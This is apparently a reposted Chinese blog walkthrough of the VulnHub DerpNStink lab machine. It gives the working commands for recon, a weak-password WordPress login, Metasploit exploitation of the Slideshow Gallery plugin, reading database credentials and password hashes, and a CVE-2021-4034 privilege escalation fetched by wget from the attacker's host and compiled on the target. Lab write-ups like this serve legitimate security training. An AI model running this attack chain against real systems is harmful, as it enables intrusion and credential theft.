0


【vulnhub】DerpNStink靶机

靶机安装

下载地址:DerpNStink: 1 ~ VulnHub

信息收集

靶机IP扫描

nmap 192.168.93.0/24

端口扫描,开放21、22、80端口

nmap -A  192.168.93.158 -p-

目录扫描

dirsearch -u http://192.168.93.158

进行网址访问,页面上只有个单词DeRPnStiNK,先记下来

点击检查,发现第一个flag

又发现存在一个文件/webnotes/info.txt进行访问

翻译一下

是需要更新本地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么

后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到数据库里面的

拼接/robots.txt

继续访问

我们重新用另一命令进行目录扫描一下,会出现许多上面没有扫出来的目录,

dirb  http://192.168.93.158

weblog目录下存在登录页面,测试一下

发现进行了域名跳转到:https://derpnstink.local/weblog/,并且页面加载失败

因此可能前面的DNS更新应该是192.168.93.158与derpnstink.local/weblog/的对应关系添加

通过目录扫描出来的,还有目录//weblog/wp-admin/

尝试弱口令登录,成功 admin/admin

漏洞利用

这个框架是WordPress,进行工具使用 wpscan 扫描,扫描到很多插件存在漏洞

wpscan --url http://derpnstink.local/weblog

使用Slideshow Gallery 存在的漏洞

因为我们知道后台的账户密码,所以我们用msf来进行getshell操作

开启msf环境

msfconsole

search slideshow                
use 1        
show option
set rhosts 192.168.93.158
set targeturi /weblog/    #设置目标的url目录地址
set wp_user admin
set wp_password admin
run

先将获取到的shell转变为交互式的shell

shell

python -c 'import pty; pty.spawn("/bin/bash")'        # 获得交互式命令行

翻看配置文件,发现了目标数据库的账号和密码

cd /var/www/html/weblog
ls
cat wp-config.php
 
root:mysql

是数据库的账号和密码,回到页面进行登录,登录成功

访问 wp_posts 表发现 flag2.txt

在 wp_users 表发现两个账户密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

破解之后是wedgie57

在靶机home目录下发现两个用户,mrderp/stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

在Desktop目录发现了flag3

提权

观察到ubuntu版本是14.04,可能存在一个漏洞。

我刚开始用的是kali上面的searchsploit工具命令进行搜索版本利用搜索出来的脚本文件,但失败了,也可能是利用的脚本不对,大家可以多尝试几个脚本,看看能否成功,也希望与大家讨论

我在这找了一个有关版本的相关提权文件,有一个本地提权漏洞CVE-2021-4034, 作用有点类似于sudo,允许用户以另一个用户身份执行命令

#这个提权漏洞利用脚本下载地址
https://github.com/arthepsy/CVE-2021-4034

将这个文件下载下来,复制到kali里面,并挂到服务上面

在反弹的交互式shell中,必须要进入tmp目录,否则无法下载

从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。

#下载命令
wget http://192.168.93.130:8000/cve-2021-4034-poc.c

#下载完成之后,权限修改
chmod +x cve-2021-4034-poc.c

#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

进行这个脚本运行,提权成功

标签: 网络安全 安全

本文转载自: https://blog.csdn.net/wbplife/article/details/140910261
版权归原作者 wbplife 所有, 如有侵权,请联系我们删除。

“【vulnhub】DerpNStink靶机”的评论:

还没有评论